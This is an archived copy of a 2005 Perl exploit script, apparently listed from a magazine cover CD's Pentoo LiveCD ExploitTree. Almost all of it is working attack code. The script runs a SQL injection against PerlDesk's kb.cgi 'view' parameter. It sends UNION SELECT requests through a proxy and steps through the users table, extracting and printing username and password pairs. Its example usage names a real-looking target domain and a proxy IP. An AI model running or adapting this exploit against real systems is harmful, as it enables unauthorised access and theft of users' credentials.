Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / perldesk / pdsploit.pl < prev

Wrap

Perl Script | 2005-03-05 | 2KB | 83 lines

#!/usr/bin/perl # Example: # kb.cgi?view=0 UNION SELECT 1,3,password,username,3,7 FROM users # Exploit is attached. # ./pde.pl www.internethosting4u.com /perldesk/kb.cgi 148.244.150.58:80 use IO::Socket; print ' ######################################################## # PerlDesk exploit # # Usage: ./pdsploit.pl host path proxy # # # # Vunerability discovered by # # deluxe89 and Astovidatu [ www.security-project.org ] # # # # Special thanks to doc and WebDoctor┤s # ######################################################## '; if($#ARGV != 2) { exit; } $host = $ARGV[0]; $path = $ARGV[1]; $proxy = $ARGV[2]; ($addr, $port) = split(/:/, $proxy); $offset = 0; while(1) { $value = "view=0%20UNION%20SELECT%20'0','0',CONCAT('_P',password,'P_'),CONCAT('_U',username,'U_'),'0','0'%20FROM%20users%20LIMIT%20$offset,1"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $addr, PeerPort => $port) || die "[-] Proxy doesn't work\n"; print $socket "GET http://$host$path?$value HTTP/1.1\nHost: $host\n\n"; $user = ''; $pass = ''; while(defined(my $data = <$socket>)) { if($data =~ m/_P(.*)P_/) { $pass = $1; } if($data =~ m/_U(.*)U_/) { $user = $1; } } if($user ne '' && $pass ne '') { print "$user:$pass\n"; } else { die "[+] Finished\n"; } $offset++; } # code by deluxe89 [ www.security-project.org ] # milw0rm.com [2005-02-05]